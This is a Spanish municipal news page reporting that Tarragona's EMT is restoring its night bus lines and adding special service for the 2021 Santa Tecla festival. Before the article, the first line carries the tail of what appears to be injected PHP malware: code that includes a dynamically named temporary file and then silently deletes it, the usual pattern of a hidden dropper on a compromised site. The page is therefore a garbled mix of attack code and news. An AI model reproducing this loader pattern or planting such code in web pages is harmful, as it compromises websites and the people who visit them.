");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> La EMT de Tarragona recupera las líneas nocturnas de autobús y establece un servicio especial para Santa Tecla
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

La EMT de Tarragona recupera las líneas nocturnas de autobús y establece un servicio especial para Santa Tecla (13/09/2021)

Con la entrada en funcionamiento de los horarios de invierno, del lunes 13 de septiembre, la Empresa Municipal de Tarragona (EMT) recupera el servicio nocturno de autobuses que quedó afectado por las medidas de prevención ante la pandemia y que vuelve al servicio regular con la reanudación de la actividad en periodo lectivo.

Se recuperan las líneas L71 (Pl. Imperial - San Pedro y San Pablo), L72 (Pl. Imperial, La Granja, Bonavista y La Canonja) y L73 (Pl. Imperial - Bosques). Jordi Fortuny, presidente de la EMT, explica que "recuperamos un servicio esencial, el del bus nocturno, que cubre una demanda importante de la ciudadanía. Y lo hacemos ahora que las condiciones lo permiten y con la reanudación de la actividad lectiva. Hay que vamos recuperando la normalidad, en la medida de lo posible, siempre que las condiciones de seguridad y prevención así lo permitan ".

Servicio especial de Santa Tecla

Estas líneas nocturnas funcionarán con un refuerzo de la frecuencia de paso desde la madrugada del 15 al 16 de septiembre y hasta la madrugada del 25 al 26 de septiembre con el fin de dar respuesta a la posible demanda que se pueda generar con motivo de las Fiestas de Santa Tecla. Durante estos días, además, la L73 (Pl. Imperial - Bosques) llegará hasta la Mora. Pasadas las fiestas, el servicio nocturno recuperará el servicio habitual en horario de invierno: las noches del viernes hacia sábado y del sábado hacia el domingo.

Por otra parte, también con motivo de la fiesta mayor, se recupera el servicio de lanzadera entre el aparcamiento disuasorio La Huerta Grande y la zona de aparcamiento cercana al Nuevo Estadio. Este servicio estará operativo del 15 al 23 de septiembre.

"Aunque esta Santa Tecla aún no se recupera la plena normalidad, sí se ha hecho un esfuerzo para ofrecer un programa de fiestas completo que permita la participación ciudadana. En este sentido, el servicio municipal de transporte pone las herramientas que garantizan una movilidad de calidad durante la cita más importante del calendario festivo tarraconense ", añade Fortuny.

Horarios de invierno, a partir del lunes 13 de septiembre

La reanudación de la actividad lectiva, el próximo lunes 13 de septiembre, en los centros educativos es el punto de partida también de los horarios de invierno de la EMT. Las líneas y frecuencias adaptan al incremento de la demanda y actividad.

Así, aparte de retirar las líneas de playas (L16, L161 y L162), se refuerza el servicio de la L8 (Valle de la Arrabassada - Hospital Joan XXIII), la L11 (Bosques - Enrique de Ossó) y L41 ( zona Educacional - Estación) para cubrir el incremento de la demanda de centros educativos cubiertos por estas líneas.

Además, entran en funcionamiento los horarios lectivos de la L42 (Complejo Educativo - Via Roma, 2) y la L22 finaliza recorrido en la parada Serrallo, en vez de Puerto Deportivo.

Puede consultar toda la información sobre líneas y horarios en: emtanemambtu.cat/

Fuente: Ayuntamiento de Tarragona

La EMT de Tarragona recupera las líneas nocturnas de autobús y establece un servicio especial para Santa Tecla

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona